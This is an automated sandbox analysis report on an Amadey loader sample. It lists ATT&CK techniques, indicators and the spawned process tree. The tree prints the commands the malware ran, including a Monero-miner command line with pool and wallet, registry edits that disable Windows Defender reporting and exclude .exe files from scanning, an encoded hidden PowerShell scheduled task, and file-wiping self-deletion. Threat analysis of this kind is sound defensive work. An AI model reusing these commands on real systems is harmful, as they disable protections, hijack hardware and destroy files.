amadey | 76a7490d3f1b0685f60a417d1c9cf96927b473825a914221f092f82ea112b571

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	schtasks.exe

LoaderBot executable 2 IoCs

resource	yara_rule
behavioral1/memory/1912-26-0x0000000000B90000-0x0000000000F8E000-memory.dmp	loaderbot
behavioral1/memory/1912-92-0x0000000000400000-0x0000000000820000-memory.dmp	loaderbot

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	schtasks.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	schtasks.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	EasySup.exe

Executes dropped EXE 26 IoCs

pid	Process
3396	timeSync.exe
2372	202.exe
1912	EasySup.exe
4960	audiodgse.exe
1580	sbinzx.exe
496	Conhost.exe
4520	pznhcda.exe
4416	pznhcda.exe
4264	updates_installer.exe
872	davincizx.exe
1396	foto1661.exe
3280	XY1oE7Dz.exe
4764	jG0vc9Pk.exe
4372	tus.exe
1352	jG8tZ4jx.exe
2360	Yx0kI0az.exe
3768	newumma.exe
2920	setup.exe
3260	Install.exe
4004	schtasks.exe
5104	Install.exe
3448	2VC364RI.exe
4492	kung.exe
1548	smss.exe
1508	sbinzx.exe
4704	sbinzx.exe

Loads dropped DLL 3 IoCs

pid	Process
4264	2VC364RI.exe
3396	timeSync.exe
3396	timeSync.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000800000001aba1-207.dat	themida
behavioral1/files/0x000800000001aba1-208.dat	themida

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001ac3a-1518.dat	upx
behavioral1/files/0x000600000001ac48-1937.dat	upx
behavioral1/files/0x000600000001ae0c-6234.dat	upx
behavioral1/files/0x000600000001ae20-6256.dat	upx
behavioral1/files/0x000600000001af7b-8242.dat	upx
behavioral1/files/0x000800000001ade8-8410.dat	upx
behavioral1/files/0x000800000001aae9-8429.dat	upx
behavioral1/files/0x000600000001afa8-8452.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.159.66.125

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	foto1661.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	XY1oE7Dz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	jG0vc9Pk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	jG8tZ4jx.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	Yx0kI0az.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\EasySup.exe"	EasySup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1882	ipinfo.io
353	api.myip.com
520	api.ipify.org
640	api.ipify.org
870	api.myip.com
878	ipinfo.io
1678	ipinfo.io
1680	ipinfo.io
352	api.myip.com
356	ipinfo.io
357	ipinfo.io
521	api.ipify.org
641	api.ipify.org
1875	api.myip.com
877	ipinfo.io
2295	api.myip.com
863	api.myip.com
1874	api.myip.com
1883	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4004	schtasks.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4520 set thread context of 4416	4520	pznhcda.exe	81
PID 4416 set thread context of 3196	4416	pznhcda.exe	18
PID 4372 set thread context of 4604	4372	tus.exe	89
PID 3768 set thread context of 3676	3768	newumma.exe	96
PID 4264 set thread context of 4100	4264	2VC364RI.exe	655
PID 1580 set thread context of 4704	1580	sbinzx.exe	110

Launches sc.exe 25 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7324	sc.exe
4948	sc.exe
8088	sc.exe
4204	sc.exe
1324	sc.exe
5456	sc.exe
10108	sc.exe
4212	sc.exe
5440	sc.exe
9148	sc.exe
8092	sc.exe
5248	sc.exe
5784	sc.exe
7560	sc.exe
9832	sc.exe
4984	sc.exe
8656	sc.exe
5876	sc.exe
2492	sc.exe
7272	sc.exe
8596	sc.exe
7616	sc.exe
5796	sc.exe
8980	sc.exe
7796	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2024	3676	WerFault.exe	96
2572	3768	WerFault.exe	164
5192	5000	WerFault.exe	158
5528	4828	WerFault.exe	170

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x000600000001ab87-50.dat	nsis_installer_1
behavioral1/files/0x000600000001ab87-50.dat	nsis_installer_2
behavioral1/files/0x000600000001ab87-46.dat	nsis_installer_1
behavioral1/files/0x000600000001ab87-46.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	timeSync.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	timeSync.exe

Creates scheduled task(s) 1 TTPs 29 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
1064	schtasks.exe
2788	schtasks.exe
4032	schtasks.exe
8304	schtasks.exe
7736	schtasks.exe
3880	schtasks.exe
6488	schtasks.exe
4212	schtasks.exe
6064	schtasks.exe
6132	schtasks.exe
4500	schtasks.exe
6636	schtasks.exe
6416	schtasks.exe
8768	schtasks.exe
968	schtasks.exe
4280	schtasks.exe
4292	schtasks.exe
6908	schtasks.exe
5440	schtasks.exe
9544	schtasks.exe
6468	schtasks.exe
3988	schtasks.exe
4016	schtasks.exe
7408	schtasks.exe
9712	schtasks.exe
10056	schtasks.exe
8088	schtasks.exe
4408	schtasks.exe
9512	schtasks.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
2820	timeout.exe
2628	timeout.exe
3536	timeout.exe
4520	timeout.exe
2420	timeout.exe
7772	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
8544	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
6960	ipconfig.exe
6480	NETSTAT.EXE
4028	ipconfig.exe
5800	NETSTAT.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
4052	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2372	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4416	pznhcda.exe
4416	pznhcda.exe
4416	pznhcda.exe
4416	pznhcda.exe
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
3396	timeSync.exe
3396	timeSync.exe
4604	AppLaunch.exe
4604	AppLaunch.exe
1408	cmmon32.exe
1408	cmmon32.exe
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
4004	schtasks.exe
4004	schtasks.exe
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE
2372	PING.EXE

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
4520	pznhcda.exe
4416	pznhcda.exe
4416	pznhcda.exe
4416	pznhcda.exe
4604	AppLaunch.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	5112	a.exe
Token: SeDebugPrivilege	1912	EasySup.exe
Token: SeDebugPrivilege	4416	pznhcda.exe
Token: SeDebugPrivilege	1408	cmmon32.exe
Token: SeDebugPrivilege	1580	sbinzx.exe
Token: SeShutdownPrivilege	3196	Explorer.EXE
Token: SeCreatePagefilePrivilege	3196	Explorer.EXE
Token: SeShutdownPrivilege	3196	Explorer.EXE
Token: SeCreatePagefilePrivilege	3196	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 3396	5112	a.exe	72
PID 5112 wrote to memory of 3396	5112	a.exe	72
PID 5112 wrote to memory of 3396	5112	a.exe	72
PID 5112 wrote to memory of 2372	5112	a.exe	73
PID 5112 wrote to memory of 2372	5112	a.exe	73
PID 5112 wrote to memory of 2372	5112	a.exe	73
PID 5112 wrote to memory of 1912	5112	a.exe	75
PID 5112 wrote to memory of 1912	5112	a.exe	75
PID 5112 wrote to memory of 1912	5112	a.exe	75
PID 5112 wrote to memory of 4960	5112	a.exe	77
PID 5112 wrote to memory of 4960	5112	a.exe	77
PID 5112 wrote to memory of 4960	5112	a.exe	77
PID 5112 wrote to memory of 1580	5112	a.exe	78
PID 5112 wrote to memory of 1580	5112	a.exe	78
PID 5112 wrote to memory of 1580	5112	a.exe	78
PID 5112 wrote to memory of 496	5112	a.exe	300
PID 5112 wrote to memory of 496	5112	a.exe	300
PID 5112 wrote to memory of 496	5112	a.exe	300
PID 496 wrote to memory of 4520	496	Conhost.exe	80
PID 496 wrote to memory of 4520	496	Conhost.exe	80
PID 496 wrote to memory of 4520	496	Conhost.exe	80
PID 4520 wrote to memory of 4416	4520	pznhcda.exe	81
PID 4520 wrote to memory of 4416	4520	pznhcda.exe	81
PID 4520 wrote to memory of 4416	4520	pznhcda.exe	81
PID 4520 wrote to memory of 4416	4520	pznhcda.exe	81
PID 5112 wrote to memory of 4264	5112	a.exe	82
PID 5112 wrote to memory of 4264	5112	a.exe	82
PID 5112 wrote to memory of 4264	5112	a.exe	82
PID 5112 wrote to memory of 872	5112	a.exe	83
PID 5112 wrote to memory of 872	5112	a.exe	83
PID 5112 wrote to memory of 872	5112	a.exe	83
PID 3196 wrote to memory of 1408	3196	Explorer.EXE	84
PID 3196 wrote to memory of 1408	3196	Explorer.EXE	84
PID 3196 wrote to memory of 1408	3196	Explorer.EXE	84
PID 5112 wrote to memory of 1396	5112	a.exe	85
PID 5112 wrote to memory of 1396	5112	a.exe	85
PID 5112 wrote to memory of 1396	5112	a.exe	85
PID 1396 wrote to memory of 3280	1396	foto1661.exe	86
PID 1396 wrote to memory of 3280	1396	foto1661.exe	86
PID 1396 wrote to memory of 3280	1396	foto1661.exe	86
PID 3280 wrote to memory of 4764	3280	XY1oE7Dz.exe	108
PID 3280 wrote to memory of 4764	3280	XY1oE7Dz.exe	108
PID 3280 wrote to memory of 4764	3280	XY1oE7Dz.exe	108
PID 5112 wrote to memory of 4372	5112	a.exe	107
PID 5112 wrote to memory of 4372	5112	a.exe	107
PID 5112 wrote to memory of 4372	5112	a.exe	107
PID 4764 wrote to memory of 1352	4764	jG0vc9Pk.exe	87
PID 4764 wrote to memory of 1352	4764	jG0vc9Pk.exe	87
PID 4764 wrote to memory of 1352	4764	jG0vc9Pk.exe	87
PID 1352 wrote to memory of 2360	1352	jG8tZ4jx.exe	106
PID 1352 wrote to memory of 2360	1352	jG8tZ4jx.exe	106
PID 1352 wrote to memory of 2360	1352	jG8tZ4jx.exe	106
PID 2360 wrote to memory of 3768	2360	Yx0kI0az.exe	164
PID 2360 wrote to memory of 3768	2360	Yx0kI0az.exe	164
PID 2360 wrote to memory of 3768	2360	Yx0kI0az.exe	164
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 4372 wrote to memory of 4604	4372	tus.exe	89
PID 5112 wrote to memory of 2920	5112	a.exe	90
PID 5112 wrote to memory of 2920	5112	a.exe	90
PID 5112 wrote to memory of 2920	5112	a.exe	90

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196
- C:\Users\Admin\AppData\Local\Temp\a.exe
  "C:\Users\Admin\AppData\Local\Temp\a.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3396
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
      4⤵
      PID:4252
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2820
- - C:\Users\Admin\AppData\Local\Temp\a\202.exe
    "C:\Users\Admin\AppData\Local\Temp\a\202.exe"
    3⤵
    - Executes dropped EXE
    PID:2372
- - C:\Users\Admin\AppData\Local\Temp\a\EasySup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\EasySup.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8Aa4eUo7y4pY2AmYtKfjKgQGhbyotQR1TC8xFpA6YJXAKaLgVec7XCtWxvXxmKzFSP7J1CHPSoa2AgwX2yKQrpQmBaiii5r -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      PID:4120
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1932
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    - Executes dropped EXE
    PID:4960
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe"
      4⤵
      Executes dropped EXE
      PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\sbinzx.exe"
      4⤵
      Executes dropped EXE
      PID:4704
- - C:\Users\Admin\AppData\Local\Temp\a\autolog.exe
    "C:\Users\Admin\AppData\Local\Temp\a\autolog.exe"
    3⤵
    PID:496
  - - C:\Users\Admin\AppData\Local\Temp\pznhcda.exe
      "C:\Users\Admin\AppData\Local\Temp\pznhcda.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:4520
    - - C:\Users\Admin\AppData\Local\Temp\pznhcda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pznhcda.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:4416
- - C:\Users\Admin\AppData\Local\Temp\a\updates_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\updates_installer.exe"
    3⤵
    - Executes dropped EXE
    PID:4264
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4100
    - - C:\Users\Admin\AppData\Local\Temp\jdtokiiktqaicmrr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jdtokiiktqaicmrr.exe"
        5⤵
        
        PID:5660
    - - C:\Users\Admin\AppData\Local\Temp\olbnwjsrgemabvqh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\olbnwjsrgemabvqh.exe"
        5⤵
        
        PID:5756
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C timeout /T 2 /nobreak >nul & del "C:\Users\Admin\AppData\Local\Temp\olbnwjsrgemabvqh.exe"
        6⤵
        
        PID:5988
        
        C:\Windows\system32\timeout.exe
        
        timeout /T 2 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:2628
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=64607 "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & erase "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & exit
        5⤵
        
        PID:3400
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 3
        6⤵
        Delays execution with timeout.exe
        
        PID:3536
      - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil file setZeroData offset=0 length=64607 "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5668
- - C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
    3⤵
    - Executes dropped EXE
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
      4⤵
      PID:5092
- - C:\Users\Admin\AppData\Local\Temp\a\foto1661.exe
    "C:\Users\Admin\AppData\Local\Temp\a\foto1661.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1396
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\XY1oE7Dz.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\XY1oE7Dz.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3280
    - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jG0vc9Pk.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jG0vc9Pk.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4764
- - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
    3⤵
    - Executes dropped EXE
    PID:2920
  - - C:\Users\Admin\AppData\Local\Temp\7zS27C7.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      PID:3260
    - - C:\Users\Admin\AppData\Local\Temp\7zS2A18.tmp\Install.exe
        
        .\Install.exe /Rdidw "525403" /S
        5⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5104
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:1372
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:2568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:4020
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:4440
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:4720
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:2624
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gIkBKTwrv" /SC once /ST 00:01:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:968
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gIkBKTwrv"
        6⤵
        
        PID:400
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gIkBKTwrv"
        6⤵
        
        PID:5832
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bqsbAisQdgUfmAHwUf" /SC once /ST 03:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\BqqakwotwtgRPyW\YESqRnE.exe\" 3C /Bvsite_idltI 525403 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:6064
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bqsbAisQdgUfmAHwUf"
        6⤵
        
        PID:5832
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "iogxlojnWQRHhtvmX" /SC once /ST 01:52:47 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\uUCCQbKVGggocfz\FpVOHLN.exe\" HU /oUsite_idyub 525403 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:4016
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "iogxlojnWQRHhtvmX"
        6⤵
        
        PID:2732
- - C:\Users\Admin\AppData\Local\Temp\a\201.exe
    "C:\Users\Admin\AppData\Local\Temp\a\201.exe"
    3⤵
    PID:4004
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:4852
- - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
    3⤵
    - Executes dropped EXE
    PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
      "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
      4⤵
      PID:3748
  - - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
      "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
      4⤵
      PID:4720
- - C:\Users\Admin\AppData\Local\Temp\a\tus.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tus.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\a\sbin22zx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sbin22zx.exe"
    3⤵
    PID:1780
  - - C:\Users\Admin\AppData\Local\Temp\a\sbin22zx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\sbin22zx.exe"
      4⤵
      PID:5392
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    - Executes dropped EXE
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
      "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
      4⤵
      PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
      "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
